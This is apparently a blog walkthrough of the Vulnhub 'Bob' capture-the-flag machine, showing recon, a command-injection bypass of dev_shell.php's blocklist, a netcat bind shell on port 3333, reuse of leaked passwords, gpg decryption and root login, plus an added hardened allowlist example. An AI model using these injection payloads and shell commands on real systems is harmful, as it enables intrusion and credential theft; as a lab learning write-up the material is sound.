BOB Walkthrough: Vulnhub CTF Challenge


This article is a walkthrough on how I solved the Bob CTF challenge. You can download Bob CTF via this link: https://www.vulnhub.com/entry/bob-101,226/.

It is a beginner-to-intermediate challenge, and at the end we have to gain root access and get the flag.

So let’s do this:

To find the vulnerable machines through your attacking machine: http://www.anonhack.in/2018/06/part-2-finding-the-ip-address-of-your-victim-in-your-vmware-hacking-lab-network/

I used netdiscover to get the IP address of the Bob virtual machine. In my case, the IP address is 192.168.0.107.

netdiscover -r 192.168.0.1/24

I scanned the host with nmap and discovered this:

So ports 80 and 21 are open. I visited their website.

It is under construction. I couldn’t find much information in the source code either. So, I fired up nikto to get more info:

nikto -h 192.168.0.107

It says robots.txt is present.

The passwords.html page contains this:

Really who made this file at least get a hash of your password to display, hackers can’t do anything with a hash, this is probably why we had a security breach in the first place. Comeon people this is basic 101 security! I have moved the file off the server. Don’t make me have to clean up the mess everytime someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
-Bob

login.php and lat_memo.html also don’t contain much information. Then, I turned to dev_shell.php:

Seems like the admin gave us a command injection platform. I used a lot of commands here but I will only give the useful ones in this article.

I tried ls as my first command.

But it didn’t seem to work, so I used a stacked approach to see if that works, and it does work:

cd . &&ls -a gave me the above result. When I looked in the directory I was in, I found 2 important files: .hint and dev_shell.bak

I downloaded dev_shell.bak. It has the following code:

<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
}
?>

It’s simply an input sanitizing script which seems to trim commands given in the array. Now, I know why the ls command was not working. 😛

The .hint file, which is a hidden file, has the following text:

No, I haven’t tried spawning a tty shell yet. So let’s spawn a shell:
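Why ls was rejected while cd . &&ls -a ran, and what a fix looks like, as an added example (not part of dev_shell.bak or of the original challenge): the page's check reduced to a function, beside an allowlist that never hands request data to a shell. The action names and binary paths are assumptions made for illustration.

```php
<?php
// The check from dev_shell.bak as a function: it rejects ';' and compares
// only the FIRST space-separated word against the blocklist.
function blocklist_allows(string $command): bool {
    $bad_words = ["pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"];
    if (strpos($command, ';') !== false) {
        return false;
    }
    $words = explode(' ', trim($command));
    return !in_array($words[0], $bad_words);
}

// Hardened form: a fixed map from action name to argv array (names and paths
// are hypothetical). The request can only select a key, never supply a command.
const ALLOWED_ACTIONS = [
    'list'   => ['/bin/ls', '-a'],
    'whoami' => ['/usr/bin/id', '-un'],
];

function run_action(string $name): ?string {
    if (!array_key_exists($name, ALLOWED_ACTIONS)) {
        return null; // unknown action: refuse, never fall through to execution
    }
    // An array command (PHP >= 7.4) is executed directly, without /bin/sh,
    // so operators such as && have no special meaning.
    $proc = proc_open(ALLOWED_ACTIONS[$name], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out;
}

// Inputs taken from the walkthrough
$inputs = ['ls', 'cd . &&ls -a', 'cd .&&nc -l -p 3333 -e /bin/bash'];
foreach ($inputs as $input) {
    printf("%-36s blocklist: %-9s allowlist: %s\n",
        $input,
        blocklist_allows($input) ? 'executes' : 'rejected',
        run_action($input) === null ? 'rejected' : 'executes');
}
echo run_action('list');
```

The blocklist passes both stacked commands because their first word is cd; the allowlist rejects all three inputs and runs only the predefined list action.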

The netcat cheat sheet came to the rescue. With the above PHP script, I gathered that nc is installed and I can use it to open a bind shell on any port. I used

cd .&&nc -l -p 3333 -e /bin/bash

and then on my Kali OS, I used this command: nc 192.168.0.107 3333

and I got a shell. This is not a real shell, so I spawned a bash shell using:

python -c 'import tty;tty.spawn("/bin/bash")'

Once I got the real shell, I checked for hidden files. I checked the home directory and found that this VM has 4 users: bob, elliot, jc, seb. I checked the elliot directory first and landed on the file theadminisdumb.txt, which said:

With this I knew that elliot is not an admin but bob is. It also gives information about the password of James [who is jc] which is Qwerty and Elliot’s password which is theadminisdumb. So I tried logging in:

su elliot //password: theadminisdumb doesn’t work

su james //password: Qwerty works

Now, I traversed the directory for Bob and found a hidden file: .old_passwordfile.html which gave me the password for sebastian [user seb] which is T1tanium_Pa$$word_Hack3rs_Fear_M3.

su seb //password works 😉

So, now I need to know the password for Bob; elliot’s password is not required since he is not the admin here. So I searched bob’s directory for any password file and I landed on Downloads.

I found backed up ftp for bob and I put it on john and it decrypts to Qwerty. So I tried it on both ftp and normal OS login but it doesn’t work.

I further searched the Documents directory where I came across these files: login.txt.gpg [I overlooked this file as jpg before 😛 and then I saw it again]

Secret [I overlooked login.txt.gpg for this folder. ;p]

and then staff.txt which doesn’t contain much information.

I went to the Secret folder and at the end of it found notes.sh and I opened it.

At first I thought it was of no use, but then it occurred to me that the starting letters of these echoed lines form: “HARPOCRATES”. I thought to try it on bob but it didn’t work.

So I went back and started looking again, all frustrated!!

I found flag.txt, which is in the / directory. But I can’t open it unless I am root.

Remember the file login.txt.gpg? That’s my last cue!

I googled .gpg and found this:

GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh).

login.txt.gpg is an encrypted file and I need a passphrase to decrypt it and I only got “HARPOCRATES” which I found in Bob’s directories.

So I tried gpg -d login.txt.gpg on the console but it is not giving a prompt for the passphrase entry. Another problem!

So I searched for more ways to pass the passphrase on the command line itself.

I found out about batch mode, wherein you can pass the decryption key on the command line itself.

gpg --batch --passphrase HARPOCRATES --decrypt login.txt.gpg

The password for bob is b0bcat_

I logged in as bob but I still can’t access the flag.txt file; it gave me this output when I ran cat /flag.txt

I used the less and more editors too, but my access was denied. So I tried logging in as root with the same password as bob’s, I got in and here is the flag.

That’s it for now!

Ciao 🙂

 

